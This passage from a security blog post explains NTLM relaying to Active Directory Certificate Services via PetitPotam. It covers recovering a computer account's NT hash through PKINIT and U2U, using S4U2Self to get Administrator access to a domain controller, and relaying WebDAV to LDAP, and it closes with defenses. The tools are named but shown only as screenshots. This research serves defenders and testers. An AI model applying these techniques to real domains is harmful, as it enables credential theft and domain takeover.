  <li>Using the session key we can decrypt the ticket, extract the PAC, and parse + decrypt the NT hash using the AS reply key.</li>
</ol>
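As a small illustration of step 2, <code class="language-plaintext highlighter-rouge">ENC-TKT-IN-SKEY</code> is just one bit in the KDCOptions bit string of the <code class="language-plaintext highlighter-rouge">TGS-REQ</code>. A stdlib sketch of composing that field (flag numbers are from RFC 4120, which counts bit 0 as the most significant bit; the helper itself is mine, not from minikerberos):

```python
# A few KDCOptions flags and their RFC 4120 bit numbers
KDC_OPTIONS = {
    "forwardable": 1,
    "renewable": 8,
    "canonicalize": 15,
    "renewable-ok": 27,
    "enc-tkt-in-skey": 28,
}

def kdc_options(*names: str) -> bytes:
    # KerberosFlags is a 32-bit string where bit 0 is the MSB
    value = 0
    for name in names:
        value |= 1 << (31 - KDC_OPTIONS[name])
    return value.to_bytes(4, "big")
```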

<p>The proof-of-concept for this, which is mostly based on <code class="language-plaintext highlighter-rouge">getPac.py</code> from impacket and on reading the kekeo source code, is called <code class="language-plaintext highlighter-rouge">getnthash.py</code>. Here’s a demo:</p>

<p><img src="/assets/img/adcs/getnthash.png" alt="Obtaining the NT hash for the computer account" class="align-center" /></p>

<h4 id="abuse">Abuse</h4>
<p>With the NT hash in our possession (the hash of the computer account that we originally relayed), we can perform attacks as that account using any tool that supports hashes for machine authentication. Alternatively, to get access to the original host, we could use the hash as an RC4 Kerberos key to create a silver ticket, which can contain any user claim and will be accepted by the host.</p>

<h3 id="using-s4u2self-to-obtain-access-to-the-relayed-machine">Using S4U2Self to obtain access to the relayed machine</h3>
<p>There is another approach to obtain access to the machine we originally relayed. Aside from using the NT hash for a silver ticket, we can also use the TGT from earlier directly. This can be done via S4U2Self. If you’re not familiar with this, the S4U2Self extension makes it possible for a Kerberos service to request a ticket on behalf of anyone towards itself, as long as the service has an SPN registered. This is also (ab)used in many delegation scenarios, and was documented as an attack by <a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#solving-a-sensitive-problem">Elad Shamir</a>. The relevant bit is that because we have a TGT for the system we want to attack, we can request a legitimate service ticket for any user that is accepted by the original system (since it is encrypted with its own service key). I once again wrote a small command line tool for this based on a minikerberos example, called <code class="language-plaintext highlighter-rouge">gets4uticket.py</code>. You should supply the ccache containing the TGT and an SPN that belongs to the system for which the TGT was issued. We can then ask for a ticket for any user, in this case the “Administrator” user.</p>

<p><img src="/assets/img/adcs/gets4uticket.png" alt="Obtaining a ticket via S4U2self" class="align-center" /></p>

<p>This ticket does indeed have Administrative access on my domain controller, as demonstrated by the ability to list the contents of the <code class="language-plaintext highlighter-rouge">c$</code> drive:</p>

<p><img src="/assets/img/adcs/smbclient_admin.png" alt="Administrative rights" class="align-center" /></p>

<h2 id="other-abuse-avenues-of-petitpotam">Other abuse avenues of PetitPotam</h2>
<p>PetitPotam also makes it possible to cause a backconnect over WebDAV, provided the WebDAV service is running. The advantage of WebDAV is that authentication happens over HTTP, which can be relayed to LDAP in the default configuration. This makes it possible to perform attacks based on Resource Based Constrained Delegation, similar to previous <a href="https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/">blogs</a> on <a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html">this</a> <a href="https://posts.specterops.io/another-word-on-delegation-10bdbe3cd94a">topic</a>. <a href="https://twitter.com/gladiatx0r/">Maximus</a> recently wrote a nicely summarized <a href="https://gist.github.com/gladiatx0r/1ffe59031d42c08603a3bde0ff678feb">Gist</a> on this, which contains the required steps and ways to get the WebDAV service running.</p>

<h1 id="defenses">Defenses</h1>
<p>A lot has already been written about defenses on this topic, and there are extensive guidelines on mitigating relaying to AD CS in Lee and Will’s <a href="https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf">whitepaper</a>. There is also the <a href="https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429">official Microsoft recommendation</a>. Personally, I’d summarize the possible defenses as follows:</p>

<ul>
  <li>Mitigate NTLM relaying attacks as much as possible by enforcing security features on sensitive services, such as LDAP signing + channel binding on the DCs and HTTPS + Extended Protection for Authentication on IIS-based services.</li>
  <li>Prevent services from authenticating to arbitrary workstations by disallowing traffic initiated from servers to workstations. An allowlist of required connections could be used if server to workstation traffic is required for some services.</li>
  <li>Disable known vulnerable services as much as possible (Spooler Service).</li>
  <li>Work on phasing out NTLM entirely.</li>
</ul>

<h1 id="credits--thanks--tools">Credits / Thanks / Tools</h1>
<p>As stated before, not much of this is my original work, and all credits go to the people referenced already in this post. The tools/adaptions shown in this blog are available on my GitHub under <a href="https://github.com/dirkjanm/PKINITtools">PKINITtools</a>.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[I did not expect NTLM relaying to be a big topic again in the summer of 2021, but among printing nightmares and bad ACLs on registry hives, there has been quite some discussion around this topic. Since there seems to be some confusion out there on the how and the why, and new attack vectors coming up fast now, I figured I’d write a short post with some more details and background. Hardly anything here is my own research, so I don’t take credit for any of this, but since these issues are “by design” and will likely not see a patch or significant change soon, they are quite relevant. That’s why I decided to write some Python tools around it and explain the process in this post. The tools are available on my GitHub.]]></summary></entry></feed>